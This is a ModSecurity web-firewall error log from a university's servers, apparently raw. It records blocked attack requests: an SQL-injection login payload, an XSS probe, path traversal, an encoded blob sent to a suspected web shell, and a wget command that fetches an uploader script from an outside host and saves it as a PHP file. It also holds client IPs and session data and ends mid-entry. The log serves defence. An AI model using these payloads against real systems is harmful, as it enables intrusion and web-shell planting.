a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzSCMCo-f0AANpqFysAAAAd"]
[Mon Aug 28 23:57:57.683550 2023] [:error] [pid 55957] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\*.+(?:x?or|div|like|between|and|id)\\\\W*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\d)|(?:\\\\^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:^[\\\\w\\\\s\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98-]+(?<=and\\\\s)(?<=or|xor ..." at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "245"] [id "981243"] [msg "Detects classic SQL injection probings 2/2"] [data "Matched Data: \\x22140.21 found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzSFcCo-f0AANqV5h4AAAAN"]
[Mon Aug 28 23:57:57.851886 2023] [:error] [pid 55957] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\*.+(?:x?or|div|like|between|and|id)\\\\W*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\d)|(?:\\\\^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:^[\\\\w\\\\s\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98-]+(?<=and\\\\s)(?<=or|xor ..." at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "245"] [id "981243"] [msg "Detects classic SQL injection probings 2/2"] [data "Matched Data: \\x22140.21 found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzSFcCo-f0AANqV5h8AAAAN"]
[Mon Aug 28 23:57:58.421517 2023] [:error] [pid 55956] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\*.+(?:x?or|div|like|between|and|id)\\\\W*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\d)|(?:\\\\^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:^[\\\\w\\\\s\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98-]+(?<=and\\\\s)(?<=or|xor ..." at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "245"] [id "981243"] [msg "Detects classic SQL injection probings 2/2"] [data "Matched Data: \\x22203.17 found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22d27e650aaefb4b1f8d561ff138450841\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241624\\x22;}32ddf272f44aead720f0d6d1f8b1ec86"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOzSFsCo-f0AANqUMPUAAAAA"]
[Mon Aug 28 23:57:59.719323 2023] [:error] [pid 55956] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\*.+(?:x?or|div|like|between|and|id)\\\\W*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\d)|(?:\\\\^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:^[\\\\w\\\\s\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98-]+(?<=and\\\\s)(?<=or|xor ..." at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "245"] [id "981243"] [msg "Detects classic SQL injection probings 2/2"] [data "Matched Data: \\x22203.17 found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22d27e650aaefb4b1f8d561ff138450841\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241624\\x22;}32ddf272f44aead720f0d6d1f8b1ec86"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOzSF8Co-f0AANqUMPYAAAAA"]
[Tue Aug 29 00:00:13.478595 2023] [:error] [pid 56014] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: , IR., MT\\x22;s:17:\\x22level_member1unla\\x22;s:1: found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x221b9f94229ee3fd61682db91a6999c1c2\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693242005\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:6:\\x22553113\\x2 [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOzSncCo-f0AANrOEikAAAAN"]
[Tue Aug 29 00:08:30.792814 2023] [:error] [pid 56101] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:logPassword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:logPassword: rahasia' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzUjsCo-f0AANslqJwAAAAT"]
[Tue Aug 29 00:12:38.092855 2023] [:error] [pid 56301] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:logUsername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>window found within ARGS:logUsername: <script>window.alert(\\x22T\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzVhsCo-f0AANvt1TAAAAAE"]
[Tue Aug 29 04:16:29.301424 2023] [:error] [pid 58858] [client 13.81.5.87] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wp-plain.php"] [unique_id "ZO0OrcCo-f0AAOXqfQkAAAAB"]
[Tue Aug 29 05:40:06.285011 2023] [:error] [pid 60102] [client 103.119.98.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:alfa3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: h0XC12 found within ARGS:alfa3: AD42WxQTWlsrDAtGFRcbXz4QexkfMHYhHT0xAzg9Ih8uLQdFFD5hECwtHFoELQdHLRchQQMTIUUsAzEAOAA9HhY6Kh8XPTVGABMXCAA9B0QtAzlJLy06Ry8tBwYsZzUBBgMMRRYTaEc7HxgeLRR3Hy8DaFo4WDkLFjILRywDF0kXKQ8DLgcHRi1mOUcsKVZdFQBpWTllHBkVPTJYHS4cWhMtOUgWPXBKF3ZoDhcufVosMhNfLAwtWy13JV0GLRtAPhAcHisfKh0XLmlaOyIHSC8iDAYCPWgDFEglXy89BEYsZylfA3UDXRYoG1gAZR8DHzB2IQQ5GAs7LQMQFi51fg0tEB4EOQwLLz0XAxcHIVsuAyFILHYPAAoEAFsrEB8eAjkQGB47Oh8FKQBXHgNgFSk9CFQvBwdHFABTWCspC10rdxtGOTkbAwYQCBwvFAtfOAQEQQUEJUAUDAM..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/1/-/index1.php"] [unique_id "ZO0iRsCo-f0AAOrG6oYAAAAO"]
[Tue Aug 29 05:54:00.171318 2023] [:error] [pid 60221] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/1/-/index1.php"] [unique_id "ZO0liMCo-f0AAOs9RGoAAAAB"]
[Tue Aug 29 05:54:03.173105 2023] [:error] [pid 60221] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/uploads/2020/"] [unique_id "ZO0li8Co-f0AAOs9RGsAAAAB"]
[Tue Aug 29 05:57:08.262210 2023] [:error] [pid 60280] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/1/-/index1.php"] [unique_id "ZO0mRMCo-f0AAOt4KzcAAAAO"]
[Tue Aug 29 05:57:15.188133 2023] [:error] [pid 60272] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/1/-/index1.php"] [unique_id "ZO0mS8Co-f0AAOtwKD8AAAAN"]
[Tue Aug 29 05:57:18.073556 2023] [:error] [pid 60272] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/uploads/2020/"] [unique_id "ZO0mTsCo-f0AAOtwKEAAAAAN"]
[Tue Aug 29 06:09:49.505688 2023] [:error] [pid 60386] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mt/mt-xmlrpc.cgi"] [unique_id "ZO0pPcCo-f0AAOvioSgAAAAA"]
[Tue Aug 29 06:09:51.652891 2023] [:error] [pid 60396] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mt/mt-xmlrpc.cgi"] [unique_id "ZO0pP8Co-f0AAOvs0q4AAAAG"]
[Tue Aug 29 06:09:53.944090 2023] [:error] [pid 60340] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mt-xmlrpc.cgi"] [unique_id "ZO0pQcCo-f0AAOu0N-0AAAAE"]
[Tue Aug 29 06:09:56.634424 2023] [:error] [pid 60351] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mt-xmlrpc.cgi"] [unique_id "ZO0pRMCo-f0AAOu-YaoAAAAR"]
[Tue Aug 29 06:09:59.213904 2023] [:error] [pid 60507] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/MT/mt-xmlrpc.cgi"] [unique_id "ZO0pR8Co-f0AAOxbex4AAAAH"]
[Tue Aug 29 06:10:01.298453 2023] [:error] [pid 60433] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/MT/mt-xmlrpc.cgi"] [unique_id "ZO0pScCo-f0AAOwR0lsAAAAJ"]
[Tue Aug 29 06:10:03.180858 2023] [:error] [pid 60396] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/mtos/mt-xmlrpc.cgi"] [unique_id "ZO0pS8Co-f0AAOvs0q8AAAAG"]
[Tue Aug 29 06:10:05.451473 2023] [:error] [pid 60508] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cms/mt-xmlrpc.cgi"] [unique_id "ZO0pTcCo-f0AAOxcO5IAAAAO"]
[Tue Aug 29 06:10:07.832276 2023] [:error] [pid 60396] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/blog/mt-xmlrpc.cgi"] [unique_id "ZO0pT8Co-f0AAOvs0rEAAAAG"]
[Tue Aug 29 06:10:10.313076 2023] [:error] [pid 60508] [client 68.219.104.180] ModSecurity: Rule 7fe1c6775ef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi/mt-xmlrpc.cgi"] [unique_id "ZO0pUsCo-f0AAOxcO5MAAAAO"]
[Tue Aug 29 06:10:31.683397 2023] [:error] [pid 60386] [client 68.219.104.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:filepath: ../../../x.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "ZO0pZ8Co-f0AAOvioS4AAAAA"]
[Tue Aug 29 06:10:32.939019 2023] [:error] [pid 60433] [client 68.219.104.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/raw.githubusercontent.com/tanjim530/Private_exploit/main/uploader.txt -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/x.php"] [unique_id "ZO0paMCo-f0AAOwR0l4AAAAJ"]
[Tue Aug 29 06:13:50.116255 2023] [:error] [pid 60350] [client 114.124.188.122] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "52.167.144.182_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/m_product.js"] [unique_id "ZO0qLcCo-f0AAOu@xIgAAAAQ"]
[Tue Aug 29 06:13:50.156153 2023] [:error] [pid 60508] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "85.208.96.197_13a697b6c30ffc8426616729e8c141171ad52ccd"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/m_image.js"] [unique_id "ZO0qLcCo-f0AAOxcO7IAAAAO"]
[Tue Aug 29 06:13:50.156153 2023] [:error] [pid 60509] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "85.208.96.197_13a697b6c30ffc8426616729e8c141171ad52ccd"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/utility/u3_usergroup.js"] [unique_id "ZO0qLsCo-f0AAOxda8kAAAAS"]
[Tue Aug 29 06:13:50.156218 2023] [:error] [pid 60433] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "85.208.96.197_13a697b6c30ffc8426616729e8c141171ad52ccd"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/main/control_page.js"] [unique_id "ZO0qLsCo-f0AAOwR0oAAAAAJ"]
[Tue Aug 29 06:13:50.229313 2023] [:error] [pid 60550] [client 114.124.163.122] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "52.167.144.59_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZO0qLsCo-f0AAOyGNa0AAAAA"]
[Tue Aug 29 06:13:50.268505 2023] [:error] [pid 60350] [client 114.124.188.122] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "196.240.58.54_58c86affda39d1422393b4ef26670d29a37e74ec"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/utility/u2_jdashboard.js"] [unique_id "ZO0qLsCo-f0AAOu@xIkAAAAQ"]
[Tue Aug 29 06:13:50.268545 2023] [:error] [pid 60392] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "196.240.58.54_fee81161e61fd48e14d21c3046951ca3c5ec25d8"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/upload_m.js"] [unique_id "ZO0qLsCo-f0AAOvoG4MAAAAP"]
[Tue Aug 29 06:13:50.309434 2023] [:error] [pid 60433] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "196.240.58.54_fee81161e61fd48e14d21c3046951ca3c5ec25d8"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/utility/u4_otority.js"] [unique_id "ZO0qLsCo-f0AAOwR0oEAAAAJ"]
[Tue Aug 29 06:13:50.344983 2023] [:error] [pid 60550] [client 114.124.163.122] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "43.225.191.42_fee81161e61fd48e14d21c3046951ca3c5ec25d8"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/utility/u6_userlog.js"] [unique_id "ZO0qLsCo-f0AAOyGNa4AAAAA"]
[Tue Aug 29 06:13:50.380134 2023] [:error] [pid 60508] [client 114.124.161.42] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "43.225.191.42_019bcaf99857cb9cf4b30592477699d826fc011c"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/utility/u1_menu.js"] [unique_id "ZO0qLsCo-f0AAOxcO7MAAAAO"]
[Tue Aug 29 06:23:09.283141 2023] [:error] [pid 60603] [client 103.119.98.179] ModSecurity: Rule 7fe1c6c1f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/uploads/2020/"] [unique_id "ZO0sXcCo-f0AAOy7k6QAAAAJ"]
[Tue Aug 29 07:38:11.440214 2023] [:error] [pid 61674] [client 103.119.98.179] ModSecurity: Rule 7fe1c67a55d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/1/-/index1.php"] [unique_id "ZO0988Co-f0AAPDqUEQAAAAD"]
[Tue Aug 29 08:03:38.098236 2023] [:error] [pid 61917] [client 114.5.219.165] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "202.162.195.90_bb710904d540c9b3464319d542f019b4af40a330"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/dashboard/dashboard_jadwalkul.js"] [unique_id "ZO1D6sCo-f0AAPHdZVcAAAAI"]
[Tue Aug 29 08:03:38.098280 2023] [:error] [pid 61987] [client 114.5.219.165] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "202.162.195.90_bb710904d540c9b3464319d542f019b4af40a330"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/dashboard/dashboard_mhs.js"] [unique_id "ZO1D6sCo-f0AAPIjH1IAAAAE"]
[Tue Aug 29 08:03:38.098389 2023] [:error] [pid 61984] [client 114.5.219.165] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "202.162.195.90_bb710904d540c9b3464319d542f019b4af40a330"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/dashboard/dashboard_rektor.js"] [unique_id "ZO1D6sCo-f0AAPIgTfgAAAAL"]
[Tue Aug 29 08:03:38.138175 2023] [:error] [pid 61881] [client 114.5.219.165] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "52.167.144.172_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZO1D6sCo-f0AAPG5iyUAAAAC"]
[Tue Aug 29 08:49:54.015171 2023] [:error] [pid 62351] [client 103.147.8.47] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "36.255.189.229_f293efc8d356d11e1581e5e4e12fb482f7eefbfa"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZO1Ov8Co-f0AAPOPRHoAAAAD"]
[Tue Aug 29 09:10:40.351926 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: 